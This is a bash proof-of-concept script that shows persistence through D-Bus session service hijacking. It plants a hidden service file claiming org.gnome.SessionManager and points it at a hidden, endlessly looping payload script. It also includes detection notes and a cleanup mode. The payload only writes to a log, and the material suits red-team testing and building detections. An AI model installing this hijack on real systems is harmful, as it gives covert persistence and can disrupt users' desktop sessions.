#!/bin/bash
# D-Bus Service Hijacking Proof Of Concept
# Per-user D-Bus session service directory; both PoC artifacts (the hidden
# .service file and the hidden payload script) are written here.
# NOTE(review): this is the $XDG_DATA_HOME/dbus-1/services location when
# XDG_DATA_HOME is at its default; the session bus is expected to consult it
# ahead of the system-wide service directories - confirm for the target bus.
# Detection: a .service file in this directory whose Name= duplicates a name
# shipped by the distribution, or whose Exec= points at a hidden or
# user-writable script, is worth alerting on.
DBUS_DIR="${HOME}/.local/share/dbus-1/services"

# Well-known bus name the PoC registers a service file for.
# Other hijacking candidates include: org.gtk.Settings
# org.gtk.vfs.Daemon
# org.gtk.vfs.GoaVolumeMonitor
# org.gtk.vfs.UDisks2VolumeMonitor
# etc....
SERVICE='org.gnome.SessionManager'
# run_default creates ~/.local/share/dbus-1/services/.persistence_payload.sh
# and ~/.local/share/dbus-1/services/.$SERVICE.service (e.g. .org.gnome.SessionManager.service)
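run_default() {
  # Installs the two PoC artifacts under $DBUS_DIR:
  #   .persistence_payload.sh  - hidden script that logs each activation
  #   .$SERVICE.service        - hidden D-Bus service file whose Exec= line
  #                              starts that script
  # Globals:  DBUS_DIR (read), SERVICE (read)
  # Outputs:  status lines and a listing of $DBUS_DIR on stdout
  # Returns:  1 if the directory or either file cannot be written
  #
  # Artifacts a defender can look for after this runs: the two hidden files
  # above, lines appended to $HOME/poc.log, and a bash process that stays
  # alive in a 5-second sleep loop.

  # Create the $DBUS_DIR directory if it does not exist
  mkdir -p "$DBUS_DIR" || return 1

  # Create a hidden payload script.
  # The delimiter is quoted ('EOL'), so nothing in the body is expanded while
  # the file is written: $HOME, $1, $2 and $(date) are evaluated only when the
  # payload itself runs. The service name therefore has to come from the
  # payload's own first argument, which the Exec= line below supplies.
  # The Exec= line passes no second argument, so as installed the
  # "original binary" branch in the payload is never taken.
  cat > "$DBUS_DIR/.persistence_payload.sh" << 'EOL' || return 1
#!/bin/bash
LOG_FILE="$HOME/poc.log"
mkdir -p "$(dirname "$LOG_FILE")"
SVC="$1" # Service name, passed as the first argument by the Exec= line
echo "[$(date)] Persistence activated via $SVC" >> "$LOG_FILE"
# Execute original binary if provided
[ -n "$2" ] && [ -x "$2" ] && "$2" "$@" &
# Keep the process alive
while true; do sleep 5; done
EOL

  # Make the payload executable
  chmod +x "$DBUS_DIR/.persistence_payload.sh" || return 1

  # Create the service file for $SERVICE.
  # Unquoted delimiter: $SERVICE and $DBUS_DIR are expanded now, so the file
  # contains the literal bus name and the absolute path of the payload.
  cat > "$DBUS_DIR/.$SERVICE.service" << EOL || return 1
[D-BUS Service]
Name=$SERVICE
Exec=$DBUS_DIR/.persistence_payload.sh "$SERVICE"
EOL

  echo "Created persistence for $SERVICE"
  ls -lah "$DBUS_DIR"
  echo "Service persistence installed."
}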
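run_cleanup() {
  # Removes the hidden service files and hidden payload scripts from $DBUS_DIR.
  # Globals:  DBUS_DIR (read)
  # Outputs:  one status line on stdout, or an error on stderr
  # Returns:  1 if DBUS_DIR is empty or unset

  # With an empty DBUS_DIR the globs below would become "/.*service" and
  # "/.*.sh" at the filesystem root, so refuse to continue.
  if [[ -z "${DBUS_DIR:-}" ]]; then
    echo "DBUS_DIR is not set; refusing to remove files" >&2
    return 1
  fi

  # The globs match every hidden file ending in "service" or ".sh", so
  # artifacts left by earlier runs with a different SERVICE value are removed
  # as well. Non-hidden files in the directory are left alone.
  rm -f -- "$DBUS_DIR"/.*service
  rm -f -- "$DBUS_DIR"/.*.sh

  # NOTE(review): only files are deleted here. A payload process that was
  # already started keeps running (its loop never exits) and $HOME/poc.log is
  # left in place; both have to be handled separately when verifying cleanup.
  echo "Removed hidden service and payload files from $DBUS_DIR"
}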
# Entry point: "./poc.sh --cleanup" removes the service config and payload;
# any other invocation (including no arguments) installs them.
case "$1" in
  --cleanup)
    run_cleanup
    ;;
  *)
    run_default
    ;;
esac